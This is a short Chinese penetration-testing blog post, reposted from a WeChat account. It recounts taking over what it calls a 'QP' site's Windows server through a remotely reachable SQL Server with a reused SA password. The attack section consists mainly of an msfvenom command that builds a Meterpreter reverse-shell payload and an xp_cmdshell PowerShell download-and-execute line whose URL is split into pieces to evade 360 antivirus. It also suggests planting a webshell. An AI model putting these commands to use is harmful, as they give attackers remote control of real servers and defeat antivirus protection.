|
所有话题标签: |
0x01 前言
这个案例是帮“ChaBug”群里一个朋友看的,说是某QP站点,直接是个支持外链的MSSQL,但不是弱口令,SA密码是在以前的服务器上找到的,这台机器应该是刚搬迁过来的服务器,用了原来的SA密码,所以可以直接远程连接,并支持xp_cmdshell执行命令,未做站库分离处理!
0x02 信息搜集
目标系统:Windows Server 2012 R2(Apache2.4.23 + PHP7.1.9)数据库版本:Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)当前权限:nt servicemssqlserver开放端口:80、135、1433、2383、3306、3389、22222(Tomcat/8.5.42)......进程名称:phpStudy.exe、http.exe、httpd.exe、mysqld.exe、navicat.exe、androidLoad.exe、GameServer.exe(游戏服务端)、LogServer.exe(日志服务)、redis-cli.exe(redis客户端)、redis-server.exe(redis服务端)、Tomcat8.new.exe(Tomcat8.new服务)、Tomcat8.neww.exe、sqlservr.exe(MSSQL服务端)、ZhuDongFangYu.exe(360主动防御)......
0x03 实战提权过程
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.**.**.238 LPORT=443 -f psh-reflection > /tmp/360.ps1
exec master.dbo.xp_cmdshell "powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.**.**.238:8888/360.ps1''))';IEX ($a+$b)"
注:通过前期的信息搜集得知里边还运行着phpStudy、Tomcat,它们默认都是以高权限运行的,所以也可以尝试找到绝对路径往里边写一个Webshell来进行权限提升,不过这个案例中禁止当前权限读取C盘下的文件,写入权限就更不用说了,这里仅为大家扩展这么一种提权思路。
本文始发于微信公众号(贝塔安全实验室):MSSQL绕过360提权实战案例
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论